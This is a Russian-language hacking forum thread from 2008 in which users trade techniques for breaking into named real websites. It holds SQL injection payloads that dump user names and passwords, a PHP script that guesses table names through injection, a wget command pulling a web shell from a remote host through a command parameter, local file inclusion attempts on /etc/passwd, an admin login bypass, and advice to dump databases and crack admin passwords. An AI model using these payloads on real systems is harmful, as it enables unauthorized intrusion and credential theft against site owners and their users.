$str=file_get_contents("site/index.php?id=1+UNION+SELECT+1,2,3,4,5,6,7,8,9+from +pro.".$ma."+limit+1,1/*");
preg_match_all("/<a href=\"(.+)\">(.+)<\/a>/isU",$str,$p);
foreach($p[2] as $k){
}
if($s==$k){
echo "ok, exist";
}
else {
echo "error";
}
}
fclose($fd);
?>
Скажите плиз какзалить шелл имеется доступ к cmd серверн на linux'e , какой запрос составить чтоб закачать шелл http://www.site.com/news.php?cmd=команда для заливки шелла.
За ранее блогадарен:)
1)путь = pwd
2)wget /Pпуть http://site.com/shell.txt
Люди скажите плиз прогу или как вопше мона взломать вордовский фаил!? плиз очень надо! и если прога то дайте ссылку!Плз
Если при вводе запроса
forum=-1+UNION+SELECT+1,CONCAT_WS(char(58),name,pass),3,4 +FROM+users+WHERE+name+NOT+IN+(0x74657374)/*
выдает
?????????:123456789
то с помощью какой функции можно преобразовать ??????
плиз
convert(concat(name,0x3a,pass) using cp1251)
convert(concat(name,0x3a,pass) using cp1251)
непрокатило но дальше я понял что делать +
Sharingan
17.05.2008, 01:06
Есть доступ к БД, есть шелл, нету прав на редактирование, название бд не mysql, что можно сделать, я как вроде искал куда можн оприсабачить линк\ифрейм(тоесть если страница берет из БД что то туда линк или фрейм засунуть) но так и не нашел может что нибуть можно сделать еще?
сливай дб декод пасс админа и в адмику... а дальше уже другая история...
при вводе http://www.сайт.com/main.php?id=21&lang=../../../шелл
выдает
Warning: main() [function.include]: Failed opening 'languages/../../../шелл' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/welcome/public_html/main.php on line 11
можно зарулить как это?
Что-то сомнительно=).Скорее сможешь читать файлы,которые находятся в папке languages и ниже=).
Инклуд возможен обычно, если в main() меняется аргумент, по-твоему желанию(или частично).
то есть забить?
хорошо есть доступ к админке другого сайта, прошел через 1' or '1=1 и пустил меня как админа. Теперь могу редактировать все страницы, пробовал включить пхп скрипт для аплода шелла, тока куда заливается не понятно, вообще не выполняются пхп скрипты. И инклуд тоже не получается.
З.Ы. На гугль или на статьи отправлять не надо уже 3 часа тут ищу и читаю не могу найти решение
1SeTh, по поводу админки - попробуй найти заливку файлов и залить шелл, т.к. похоже ты редактируешь html'ные шаблоны, а не сам код страницы, т.е. php выполнить скорее всего не получица.
А по поводу include'а - ты можешь читать любые локальные файлы.
я уже пробовал пхпышный написать в html и если посмотреть на источник страницы то можно увидеть мой код в виде <?php код ?> :confused: , а так на страницу не отображается
а каким образом при помощи инклуда можно получить листинг файлов?
я уже пробовал пхпышный написать в html и если посмотреть на источник страницы то можно увидеть мой код в виде <?php код ?> :confused: , а так на страницу не отображается
а каким образом при помощи инклуда можно получить листинг файлов?
пхп код выполняется на строне сервера. или я что то не понял что ты хочешь?
1SeTh, никак. Через include можно посмотреть например конфиги, или ещё что-то, что тебя интересует.
пробовал вбить
../../../../../../../etc/httpd/conf/httpd.conf
../../../proc/version
и т.д после lang=
выдает ту же самую ошибку.
1SeTh, попробуй etc/passwd. А то что ты указал - не обязательно должно существовать.
да забыл сказать что пробовал etc/passwd на что мне сервер ответил:
Forbidden
You don't have permission to access /main.php on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
и с этим тоже etc/passwd%00
http://welcomearmenia.com/main.php?id=-1+union+select+1/* - скуля
верно, теперь осталось подобрать поля. Пока что кроме названии текущий базы и рута ничего не смог извлечь
ну еще версии
4.1.22-standardwelcomea_aleks@localhostwelcomea_sdays
был бы глобальный инклуд.мона было бы подгрузить с сайта шелл.А в локальном инклуде можно выполнить шелл через логи,если повезёт )).ну а в четвёртой версии перебором ток,если нет режима суперотладки:РР.
вот к примеру иньекция в ипб 1.3 http://www.letov.org/index.php?act=Members&max_results=30&filter=1&sort_order=asc&sort_key=name&st=1'
каким макаром из нее можно чтото получить?
cheb
Там инъекция после Limit и имеется order by, в таком случае ничего получить не удастся
Basurman
18.05.2008, 14:37
ORDER BY m.name asc
LIMIT 1',30
никаким макаром.
спасибо за мега шустрый ответ :))))
MaSter GeN
18.05.2008, 18:28
вообшем такая проблема нашел скуль в 2х в разных параметрах на одном сайте в одном есть полные отсчеты обшибках но нет вывода на экран в другом нету отсчета но есть вывод на экран
вотс первый
http://www.revolution.co.uk/_forum.php?neuron=1 union select null,null,null,null,null,null,null,null,null,null, null,null,null from users/*
проходит без ошибок то есть таблица "users" существует ;)
во втором
запрос вида
http://www.revolution.co.uk/_forum.php?neuron=1&topic=4981&message=-58008 union select 1,aes_decrypt(aes_encrypt(version(),0x71), 0x71),3,aes_decrypt(aes_encrypt(user(),0x71), 0x71),aes_decrypt(aes_encrypt(database(),0x71), 0x71),6,7,8,9/*
выдает user,version,database а вот на from userS материться оч интересно почему ?
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot